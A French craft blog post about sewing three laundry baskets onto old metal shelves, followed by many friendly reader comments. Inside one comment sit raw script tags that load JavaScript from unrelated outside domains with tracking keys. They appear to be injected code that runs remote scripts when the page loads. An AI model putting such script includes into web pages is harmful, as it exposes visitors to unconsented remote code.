• Triplette de Panières à Linge (Couture)

     

     

    Triplette de Panières à Linge (Couture)

     

     

    Bonjour à Toutes,

     

    Voilà mon Blog paré pour les Fêtes, avec la musique d'ambiance qui va bien.... Pour donner du Baume au cœur à Toutes celles qui resteront raisonnables et qui n'auront pas la tablée qu'elles voudraient pour le Réveillon, j'en fais partie....

     

    Pour celles que ça intéresse j'ai placé dans la Rubrique "Mes Tubes"-"Noël" ICI les enfants de la Bannière...

     

     

    Triplette de Panières à Linge (Couture)

     

     

    Mais pour ce jour, je viens vous compter mon aventure couturière, pourquoi, chez moi ça devient galère à chaque fois.... LOL !

     

     

    Triplette de Panières à Linge (Couture)

     

    J'avais dans la tête l'envie de me faire des panières pour ma buanderie.... et c'est quand j'ai vu de vieilles étagères métalliques dans le grenier que j'avais trouvé mon support...

    Comme disait ma Grand-Mère : "Quand tu l'as dans la tête, tu ne l'as pas ailleurs !!!"

     

    Les couturières, vous pouvez vous moquer....

     

    Allez je vous montre....

     

     

    Triplette de Panières à Linge (Couture)

     

     

     

     

     

    Triplette de Panières à Linge (Couture)

     

     

     

     

     

    Triplette de Panières à Linge (Couture)

     

     

     

     

     

    Triplette de Panières à Linge (Couture)

     

     

     

     

     

    Triplette de Panières à Linge (Couture)

     

    [ A Retrouver dans la Rubrique "Séparations"-"Loisirs" ICI ]

     

     

    N'oubliez pas de me dire ce que vous en pensez....

    On se retrouve Jeudi pour vous montrer ma déco de Noël

     

     

    Triplette de Panières à Linge (Couture)

     

    [ A Retrouver dans la Rubrique "Bisous"-"Divers" ICI ]

     

     

     

     

     

    Je vous souhaite un Bon et Magique Mois de...

     

     

    Triplette de Panières à Linge (Couture)

     

     

     

     

     

     

    Triplette de Panières à Linge (Couture)

     

     

     

     


    Tags Tags : , , ,
  • Commentaires

    41
    Mardi 8 Décembre 2020 à 10:31

    bravo ! ça va donner envie à tout le monde de trier, laver, sécher et repasser tout ton linge du coup, tu ne vas plus rien avoir à faire tu vas voir ;) c'est à la fois joli et pratique, bravo!!

    40
    Samedi 5 Décembre 2020 à 20:30

    Je trouve ton idée géniale et bien pensé pour le tri de ton linge bravo

    Gros bisous Pierrette67

    39
    Samedi 5 Décembre 2020 à 19:14

    une idée bien pratique. bonne soirée bisous

    38
    Vendredi 4 Décembre 2020 à 08:31

    Bravo pour cette astuce qui va tout changer chez toi ! tu as toujours des idées sensas ! Passe une bonne journée, bravo pour ton blog qui est splendide. Bises et amitié.

    37
    Jeudi 3 Décembre 2020 à 13:13

    Ben voilà une idée bien pratique et joliment réussie!

    Bisous et belle journée

    36
    Jeudi 3 Décembre 2020 à 07:46

    J'admire ta débrouillardise Valie ! Beau travail ! Avec ce beau tissus ça décore bien ta buanderie et ce sera bien pratique. Bravo !

    Bonne période de l'Avent à toi !

    Bisous bisous !

    35
    Jeudi 3 Décembre 2020 à 00:16
    dane

    coucou ma belle et bien elles sont très réussies tes panières a linge joli tissus ce qui ne gâche rien félicitations tu as assuré grave bravo a bientôt bisous

    34
    Jacline-H-49
    Mercredi 2 Décembre 2020 à 20:18

    Coucou ma Valie, 

    Magnifique ta bannière pour ce mois de Décembre, qui présage un bon Noël.

    Encore une idée géniale avec tes panières ! Pas de pertes ! et c'est du costaud !! De plus elles se retirent facilement pour les laver.

    Te voilà rassurée, pas d'erreur dans les couleurs de linge. 

    Bonne nuit ma championne

    et doux jeudi demain.

    GROS BISOUS TENDRESSE de

    Jacline 

     

    33
    Jeannine (cristal24)
    Mercredi 2 Décembre 2020 à 11:19

    C'est très bien ce que tu as fait, je crois que moi, j'en serais incapable, alors bravo.

    Enfin, je me débrouille un peu quand même....!!wink2 mais il ne faut pas que ce soit trop compliqué (hi hi !!)

    Bises.

    Jeannine

    32
    Mercredi 2 Décembre 2020 à 11:09
    Tu est très douée bonne idée moi ses impossible car machine à laver et sèche-linge son au garage bonne journée bisous
    31
    Mercredi 2 Décembre 2020 à 11:01

    c'est super et très pratique ! bravo pour tes bonnes idées 

    bisous

    30
    qinoa
    Mercredi 2 Décembre 2020 à 10:30

    c'est une belle réalisation, certes pas parfaite, mais c'est fait maison, avec ton coeur et surtout, avec un petit manque de pratique. Je sais qu'il y a quelques années, je ne faisais pas des choses parfaites, maintenant je commence à m'améliorer, peut-être dans 10 ans ce sera parfait hihihi

    bzz

    29
    Mercredi 2 Décembre 2020 à 01:24

    Ça c'est de l'organisation ! Et si j'avais encore ma maison, et donc de la place, je me serais inspirée de ton idée car c'est tellement désagréable de devoir sans cesse replonger dans le panier à linge pour trier, couleurs, blanc, clair, foncé... !!!

    Bisous

     

    28
    Mardi 1er Décembre 2020 à 20:55

    Que tu es créative et merci pour cette belle musique.

    https://i.postimg.cc/Qtb8RjRM/cath-evy-mait.gif

    27
    Mardi 1er Décembre 2020 à 18:55

     Coucou Valie

    Superbe idée bravo bisous

    26
    Mardi 1er Décembre 2020 à 18:42

    Coucou ma petite Valie

    D'abord merci pour ton passage sur mon blog et bravo pour le new look de ton univers! Et la musique super et avec les écouteurs... encore mieux!!!

    Et bravo pour ton esprit créatif de couture! C'est génial et ça va donner plein d'idées à beaucoup!!!!

    Gros bisous et bonne soirée

    25
    Mardi 1er Décembre 2020 à 17:51

    Quelle superbe idée ! Bravo ! Bonne soirée bien au chaud ! Bisous...

    24
    Mardi 1er Décembre 2020 à 17:27

    Bonsoir ma douce Valie

    Comme c'est beau ton désign pour l'hiver et les fêtes

    Comme toujours tu as de bonnes idées et c'est pratique de pourvoir mettre son linge sale au bon endroit ça évite des accidents

    Comme toi nous seront seuls aux fêtes il faut bien se priver un peu si on veut que la situation s'améliore

    bonne soirée et gros bisous

    ton amie Janine

    23
    Mardi 1er Décembre 2020 à 17:02

     Top ton travail de couture et surtout utile ;

    bonne fin d'après-midi ; bisous / Nicole

    22
    Mardi 1er Décembre 2020 à 16:51

    Ce n'est pas moi qui te dirai que ce n'est pas bien ! J'avais dans l'idée de faire une séparation pour le linge sale. Mais je n'ai pas la place chez moi... Résultat je passe mon temps à trier le linge sale avant de faire une machine !

    Bises

    Thaly 

    21
    Mardi 1er Décembre 2020 à 15:22

    Qu'il est joli ton blog !

    Et bien au moins ton linge sale sera bien rangé et ton grenier par la même occasion débarrassé !

    Tu vraiment de superbes idées.
    Bonne fin de journée.
    Gros bisous.

     

    20
    Mardi 1er Décembre 2020 à 14:43

    Quelle belle idée ma belle Valie, tu en sa pleins la tête. Bonne soirée, bisou rose tendresse !

    19
    Mardi 1er Décembre 2020 à 12:30

    Très belle ta nouvelle déco de Noël!! J'aime beaucoup le petits personnages de la souris......Génial pour ta créations couture et beau relooking, le tissu est vraiment très beau et super idée que tu as eu là!

    Bisous et douce journée

    18
    Mardi 1er Décembre 2020 à 12:07
    lamanuelle25

    Voilà une bonne idée et joliment réalisée!! Bravo! bises Nadine

    17
    Mardi 1er Décembre 2020 à 12:00

    Que non, je ne me moquerait pas de toi. Tu as eut une très bonne idée, au moins tu as redonné une autre vie à tes étagères, comme quoi certaines fois c'est bon de garder les choses. Du beau travail et une panière à linge unique en son genre

    Bravo à toi

    Passe une bonne journée

    Gros bisous

    16
    Mardi 1er Décembre 2020 à 12:00

    bonne idée c est drolement pratique ton histoire

    bisous

    15
    Mardi 1er Décembre 2020 à 11:27

    Géniale l'idée, comme quoi il ne faut rien jeter, Lol !! Tu es super douée ma tite Valie, Bravo !

    Agréable journée, Doux Bisous affectueux.

    14
    mamijojo77100
    Mardi 1er Décembre 2020 à 10:42

    NON faut pas se moquer!!  vu la place qu tu as tu a je trouve l idee fort interessante. tout est en ordre tes contenants sont bien penses!!  bravo pour ces debuts dans la couture. c est en forgeant qu on devient forgeron.. il a plu tte la nuit ce matin calme mais frisquet. bizzzz  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1606815474064" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    13
    Mardi 1er Décembre 2020 à 10:36

      et  oui  tu  sais  tout  faire   coudre  broder , nous  faire  de  beaux  gifs enfin  tout  !!!! bravo

    et  j'admire  ta  belle  idée 

      gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    12
    Mardi 1er Décembre 2020 à 10:30

    Moi ce que je sais ,c'est que j'apprends beaucoup de ton imaginaire créatif..Là c'est génial et voilà notre Valie qui transforme tout...J'adore tes idées.

    Ta bannière est si mignonne qu'une envie ...y rentrer dedans pour vivre mes Noëls de Fillette..Merci pour tes trésors..Je suis gaga te tout...

    Bel Avent ma Douce.

    Mille gros bisous.Merci*

    mardi 24 novembre 2020

    11
    Jour de mai
    Mardi 1er Décembre 2020 à 09:52

    Coucou Valie, 

    Déjà Bravo pour la bannière, c'est Noël sur ton blog et la musique apporte encore un plus. 

    Sinon tu nous demandes notre avis sur ta réalisation, eh bien pour moi c'est une superbe idée d'avoir recyclé ces supports et quoi que tu en dises, tu t'es très bien débrouillée pour faire ces paniers à linge et même si tu t'arraches les cheveux, attention à ne pas trop en arracher............... hihihi. MdR......... c'est parfait. Et plus de catastrophes de couleurs.

    Bravo à toi et ton imagination débordante. 

    Merci pour les gifs. 

    Très belle journée 

    Gros bisous ♥♥♥

    LN

    10
    Mardi 1er Décembre 2020 à 09:51

    Alors déjà, j'adore le nouveau décor dans lequel tu nous accueilles !! C'est splendide et tout à fait dans l'esprit des fêtes.
    Et tes panières je les trouve très réussies et bien judicieux ... Quant à l'expression ... ah ah ah je l'ai souvent moi même entendue !!! Mais comme quoi finalement ça apprend à être perséverante et c'est une belle chose !!

    Gros Bisous

    9
    Mardi 1er Décembre 2020 à 09:51
    Cc j adore ton premier gif couture trop sympa

    Pour ta panière super idée j aimerais faire ça aussi mais comme qui dirait que j ai un manque de place alors j improvise avec 2 bacs
    Bravo en tout cas tu as bien bataille a ce que je vois

    Gros bisous belle journée nous beau mais très froid
    8
    marianne pirotte
    Mardi 1er Décembre 2020 à 09:30

    Un bien joli relooking, c'est une excellente idée !!

    Gros bisous bien froid, la neige à fait son apparition hier soir

    Marianne

    7
    Mardi 1er Décembre 2020 à 09:23
    En voila une bonne idée, bravo pour a création. Tiens ma mère disait la même chose Bonne journée. Gros bisous
    6
    Gaelle
    Mardi 1er Décembre 2020 à 08:54
    Une super idée de recyclage et tes panieres sont tres réussies. On ne voit pas du tout que tu tes tiré les cheveux !!! Mdr
    Biz et bonne journée
    Gaelle
    5
    Mardi 1er Décembre 2020 à 08:32

    Bonjour Valie, eh bien c'est réussi ! très utile ces panières à linge

    Merci aussi pour "l'ambiance musicale" avec Ella Fitzgerald, et pour tes beaux gifs, bisous

    Moi j'aime bien en ce moment cette chanson :

    http://mamyvel-creations.eklablog.com/il-faut-croire-aux-anges-alain-morisod-a204262032

     

    4
    Mardi 1er Décembre 2020 à 07:31

    Bonjour ma Valie, c'est vachement bien réussi, tu vois que tu te débrouilles bien en couture, même si parfois tu t'arraches les cheveux.... trop bien tes panières bravo à toi

    Passe une belle journée et à très vite

    Bisous de Pat

    3
    JO
    Mardi 1er Décembre 2020 à 07:25
    Coucou ma Valie
    Il y en a des idées dans la tête
      • JO
        Mardi 1er Décembre 2020 à 09:19

        Recoucou

        Ah bin!!! il manque plus que la moitié de mon message!!! Pfffff, voilà! de vouloir écrire mon message sur mon phone(Grrr)

        Toujours est-il, méga bonne idée, c'est génial!!

        Plus besoin de faire le tri au moment des lessives(bravo)

        Agréable journée ma douce, chez moi, un peu nuageux

        GROS BISOUS DOUX

        JO

    2
    Mohican
    Mardi 1er Décembre 2020 à 07:11

    Une bonne idée bien réussie. Bravo

     

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :